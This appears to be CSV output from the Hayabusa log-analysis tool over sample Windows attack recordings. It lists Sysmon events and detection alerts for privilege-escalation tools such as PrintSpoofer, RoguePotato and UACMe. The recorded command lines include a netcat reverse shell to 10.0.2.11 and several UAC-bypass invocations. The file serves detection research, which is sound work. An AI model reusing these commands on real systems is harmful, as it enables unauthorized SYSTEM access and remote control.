+2020-04-26 07:20:18.975 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\AppData\Local\Microsoft\OneDrive\OneDrive.exe"" /background | Process: C:\Users\IEUser\AppData\Local\Microsoft\OneDrive\OneDrive.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x1d39b | PID: 864 | PGUID: 747F3D96-B7A2-5EA4-0000-0010982F1200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:20:21.251 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\regedit.exe"" | Process: C:\Windows\regedit.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x1d39b | PID: 3256 | PGUID: 747F3D96-B7A5-5EA4-0000-0010CAB51300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:20:21.263 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 6964 258 0000021FF266EC20 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 7036 | PGUID: 747F3D96-B7A5-5EA4-0000-0010EAB91300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:20:26.261 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\regedit.exe"" | Process: C:\Windows\regedit.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x1d36c | PID: 4480 | PGUID: 747F3D96-B7AA-5EA4-0000-001066001700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:21:08.564 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 2792 | PGUID: 747F3D96-B7D4-5EA4-0000-0010E09B1700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:21:18.412 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k NetworkService -p | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e4 | PID: 6548 | PGUID: 747F3D96-B7DE-5EA4-0000-0010FA4E1800,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:21:19.340 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k NetworkService -p -s WinRM | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e4 | PID: 992 | PGUID: 747F3D96-B7DF-5EA4-0000-001052671800,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:21:19.629 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1396 | PGUID: 747F3D96-B7DF-5EA4-0000-001080711800,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-05-03 03:01:52.553 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Tools\PrivEsc\PrintSpoofer.exe | PID: 7212 | PGUID: 747F3D96-B49D-5EAD-0000-001029FEBE00,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx
+2020-05-03 03:01:54.855 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: PrintSpoofer.exe -i -c powershell.exe | Process: C:\Users\IEUser\Tools\PrivEsc\PrintSpoofer.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x812b1 | PID: 6760 | PGUID: 747F3D96-B592-5EAD-0000-0010ECCBC200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx
+2020-05-03 03:01:54.863 +09:00,MSEDGEWIN10,17,medium,,Pipe Created_Sysmon Alert,Possible PrivEsc attempt - Rogue Spoolss Named Pipe | Pipe: \9023de59-e026-4da5-97dd-913597cd038f\pipe\spoolss | Process: c:\Users\IEUser\Tools\PrivEsc\PrintSpoofer.exe | PID: 6760 | PGUID: 747F3D96-B592-5EAD-0000-0010ECCBC200,rules/hayabusa/sysmon/alerts/17_PipeCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx
+2020-05-03 03:01:54.863 +09:00,MSEDGEWIN10,17,critical,Evas | PrivEsc,EfsPotato Named Pipe,,rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx
+2020-05-03 03:01:54.864 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\spoolss | Process: c:\Users\IEUser\Tools\PrivEsc\PrintSpoofer.exe | PID: 6760 | PGUID: 747F3D96-B592-5EAD-0000-0010ECCBC200,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx
+2020-05-03 03:01:54.864 +09:00,MSEDGEWIN10,18,medium,,Pipe Connected_Sysmon Alert,Possible PrivEsc attempt - Rogue Spoolss Named Pipe | Pipe: \9023de59-e026-4da5-97dd-913597cd038f\pipe\spoolss | Process: System | PID: 4 | PGUID: 747F3D96-6AB8-5EAD-0000-0010EB030000,rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx
+2020-05-03 03:01:54.864 +09:00,MSEDGEWIN10,18,critical,Evas | PrivEsc,EfsPotato Named Pipe,,rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx
+2020-05-03 03:01:54.867 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: powershell.exe | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: PrintSpoofer.exe -i -c powershell.exe | LID: 0x3e7 | PID: 1428 | PGUID: 747F3D96-B592-5EAD-0000-0010D4CDC200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx
+2020-05-03 03:01:54.867 +09:00,MSEDGEWIN10,1,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx
+2020-05-03 03:01:57.418 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\whoami.exe"" | Process: C:\Windows\System32\whoami.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: powershell.exe | LID: 0x3e7 | PID: 6004 | PGUID: 747F3D96-B595-5EAD-0000-00106BFDC200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx
+2020-05-03 03:01:57.418 +09:00,MSEDGEWIN10,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx
+2020-05-03 03:01:57.418 +09:00,MSEDGEWIN10,1,high,PrivEsc | Disc,Run Whoami as SYSTEM,,rules/sigma/process_creation/proc_creation_win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx
+2020-05-03 03:01:57.418 +09:00,MSEDGEWIN10,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx
+2020-05-07 22:13:01.683 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,PrivEsc - T1088 - UACBypass - changepk UACME61 | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\Launcher.SystemSettings\shell\open\command\(Default): c:\Windows\System32\cmd.exe | Process: C:\Windows\system32\reg.exe | PID: 7084 | PGUID: 747F3D96-095D-5EB4-0000-001082FF1700,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_61_Changepk.evtx
+2020-05-07 22:13:02.481 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""c:\Windows\System32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\ChangePk.exe"" | LID: 0x2ecba | PID: 5216 | PGUID: 747F3D96-095E-5EB4-0000-0010D46F1800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_61_Changepk.evtx
+2020-05-10 09:09:36.635 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: NetworkServiceExploit.exe -i -c ""c:\Windows\System32\cmd.exe"" | Process: C:\Users\IEUser\Tools\PrivEsc\NetworkServiceExploit.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: ""cmd.exe"" | LID: 0x3e4 | PID: 8028 | PGUID: 747F3D96-4640-5EB7-0000-0010292D4B01",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx
+2020-05-10 09:09:36.647 +09:00,MSEDGEWIN10,17,info,,Pipe Created,\frAQBc8Wsa1 | Process: c:\Users\IEUser\Tools\PrivEsc\NetworkServiceExploit.exe | PID: 8028 | PGUID: 747F3D96-4640-5EB7-0000-0010292D4B01,rules/hayabusa/sysmon/events/17_PipeCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx
+2020-05-10 09:09:36.662 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\frAQBc8Wsa1 | Process: System | PID: 4 | PGUID: 747F3D96-3B8B-5EB5-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx
+2020-05-10 09:09:36.701 +09:00,MSEDGEWIN10,17,info,,Pipe Created,<Anonymous Pipe> | Process: c:\Users\IEUser\Tools\PrivEsc\NetworkServiceExploit.exe | PID: 8028 | PGUID: 747F3D96-4640-5EB7-0000-0010292D4B01,rules/hayabusa/sysmon/events/17_PipeCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx
+2020-05-10 09:09:36.701 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,<Anonymous Pipe> | Process: c:\Users\IEUser\Tools\PrivEsc\NetworkServiceExploit.exe | PID: 8028 | PGUID: 747F3D96-4640-5EB7-0000-0010292D4B01,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx
+2020-05-10 09:09:36.701 +09:00,MSEDGEWIN10,17,info,,Pipe Created,<Anonymous Pipe> | Process: c:\Users\IEUser\Tools\PrivEsc\NetworkServiceExploit.exe | PID: 8028 | PGUID: 747F3D96-4640-5EB7-0000-0010292D4B01,rules/hayabusa/sysmon/events/17_PipeCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx
+2020-05-10 09:09:36.701 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,<Anonymous Pipe> | Process: c:\Users\IEUser\Tools\PrivEsc\NetworkServiceExploit.exe | PID: 8028 | PGUID: 747F3D96-4640-5EB7-0000-0010292D4B01,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx
+2020-05-10 09:09:36.709 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: c:\Windows\System32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: NetworkServiceExploit.exe -i -c ""c:\Windows\System32\cmd.exe"" | LID: 0x3e7 | PID: 372 | PGUID: 747F3D96-4640-5EB7-0000-0010EF364B01",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx
+2020-05-10 09:09:38.023 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49682 (MSEDGEWIN10) | Dst: 127.0.0.1:445 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-3B8B-5EB5-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx
+2020-05-10 09:09:38.023 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49682 (MSEDGEWIN10) | Dst: 127.0.0.1:445 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-3B8B-5EB5-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx
+2020-05-10 09:09:43.372 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: whoami | Process: C:\Windows\System32\whoami.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: c:\Windows\System32\cmd.exe | LID: 0x3e7 | PID: 7672 | PGUID: 747F3D96-4647-5EB7-0000-0010B3454B01,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx
+2020-05-10 09:09:43.372 +09:00,MSEDGEWIN10,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx
+2020-05-10 09:09:43.372 +09:00,MSEDGEWIN10,1,high,PrivEsc | Disc,Run Whoami as SYSTEM,,rules/sigma/process_creation/proc_creation_win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx
+2020-05-10 09:09:43.372 +09:00,MSEDGEWIN10,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx
+2020-05-10 09:11:16.714 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 180 | PGUID: 747F3D96-46A4-5EB7-0000-00109FE74C01,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx
+2020-05-10 09:11:20.824 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 192.168.56.101:49683 (MSEDGEWIN10) | Dst: 192.168.56.1:139 (LAPTOP-JU4M3I0E) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-3B8B-5EB5-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx
+2020-05-12 08:21:56.493 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: RoguePotato.exe -r 10.0.2.11 -e ""c:\Users\IEUser\tools\misc\nc64.exe 10.0.2.11 3001 -e cmd.exe"" -l 9999 | Process: C:\Users\IEUser\Tools\PrivEsc\RoguePotato.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: ""cmd.exe"" | LID: 0x3e5 | PID: 4200 | PGUID: 747F3D96-DE14-5EB9-0000-0010BE064300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx
+2020-05-12 08:21:56.519 +09:00,MSEDGEWIN10,17,medium,,Pipe Created_Sysmon Alert,Rogue Epmapper np detected - possible RoguePotato privesc | Pipe: \RoguePotato\pipe\epmapper | Process: c:\Users\IEUser\tools\PrivEsc\RoguePotato.exe | PID: 4200 | PGUID: 747F3D96-DE14-5EB9-0000-0010BE064300,rules/hayabusa/sysmon/alerts/17_PipeCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx
+2020-05-12 08:21:56.519 +09:00,MSEDGEWIN10,17,critical,Evas | PrivEsc,EfsPotato Named Pipe,,rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx
+2020-05-12 08:21:56.562 +09:00,MSEDGEWIN10,18,medium,,Pipe Connected_Sysmon Alert,Rogue Epmapper np detected - possible RoguePotato privesc | Pipe: \RoguePotato\pipe\epmapper | Process: System | PID: 4 | PGUID: 747F3D96-545A-5EBA-0000-0010EB030000,rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx
+2020-05-12 08:21:56.562 +09:00,MSEDGEWIN10,18,critical,Evas | PrivEsc,EfsPotato Named Pipe,,rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx
+2020-05-12 08:21:56.587 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: c:\Users\IEUser\tools\misc\nc64.exe 10.0.2.11 3001 -e cmd.exe | Process: C:\Users\IEUser\Tools\Misc\nc64.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: RoguePotato.exe -r 10.0.2.11 -e ""c:\Users\IEUser\tools\misc\nc64.exe 10.0.2.11 3001 -e cmd.exe"" -l 9999 | LID: 0x3e7 | PID: 4468 | PGUID: 747F3D96-DE14-5EB9-0000-00107C0F4300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx
+2020-05-12 08:21:56.661 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: c:\Users\IEUser\tools\misc\nc64.exe 10.0.2.11 3001 -e cmd.exe | LID: 0x3e7 | PID: 224 | PGUID: 747F3D96-DE14-5EB9-0000-001079154300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx
+2020-05-12 08:22:26.650 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ? | LID: 0x3e7 | PID: 5252 | PGUID: 747F3D96-DE32-5EB9-0000-00103FC14300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx
+2020-05-12 08:22:26.650 +09:00,MSEDGEWIN10,1,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx
+2020-05-12 08:22:26.650 +09:00,MSEDGEWIN10,1,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx
+2020-05-13 00:06:49.019 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: Akagi.exe 58 c:\Windows\System32\cmd.exe | Process: C:\Users\IEUser\Tools\PrivEsc\Akagi.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x89eef | PID: 1036 | PGUID: 747F3D96-BB89-5EBA-0000-001057413600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx
+2020-05-13 00:06:49.019 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx
+2020-05-13 00:06:49.183 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,PrivEsc - Rogue Windir - UAC bypass prep | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000\Environment\windir: C:\Users\IEUser\AppData\Local\Temp\DNeruK | Process: C:\Windows\explorer.exe | PID: 1036 | PGUID: 747F3D96-BB89-5EBA-0000-001057413600,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx
+2020-05-13 00:06:49.184 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\DNeruK\system32\Clipup.exe | Process: C:\Windows\explorer.exe | PID: 1036 | PGUID: 747F3D96-BB89-5EBA-0000-001057413600,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx
+2020-05-13 00:06:49.211 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 328 310 0000028A37652590 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 6968 | PGUID: 747F3D96-BB89-5EBA-0000-0010FB4C3600,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx
+2020-05-13 00:06:49.390 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Users\IEUser\AppData\Local\Temp\DNeruK\system32\Clipup.exe -o -previd pe386 | Process: C:\Users\IEUser\AppData\Local\Temp\DNeruK\system32\Clipup.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\DllHost.exe /Processid:{BD54C901-076B-434E-B6C7-17C531F4AB41} | LID: 0x89ebf | PID: 1088 | PGUID: 747F3D96-BB89-5EBA-0000-001042653600,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx
+2020-05-13 00:06:49.390 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx
+2020-05-13 00:06:49.390 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx
+2020-05-13 00:06:49.390 +09:00,MSEDGEWIN10,1,high,Exec | Evas | PrivEsc,CMSTP UAC Bypass via COM Object Access,,rules/sigma/process_creation/proc_creation_win_cmstp_com_object_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx
+2020-05-13 00:06:49.447 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: c:\Windows\System32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Users\IEUser\AppData\Local\Temp\DNeruK\system32\Clipup.exe -o -previd pe386 | LID: 0x89ebf | PID: 4688 | PGUID: 747F3D96-BB89-5EBA-0000-001019683600,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx
+2020-05-13 09:28:16.122 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s PlugPlay | LID: 0x3e7 | PID: 8052 | PGUID: 747F3D96-3F20-5EBB-0000-0010035E3600,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/revshell_cmd_svchost_sysmon_1.evtx
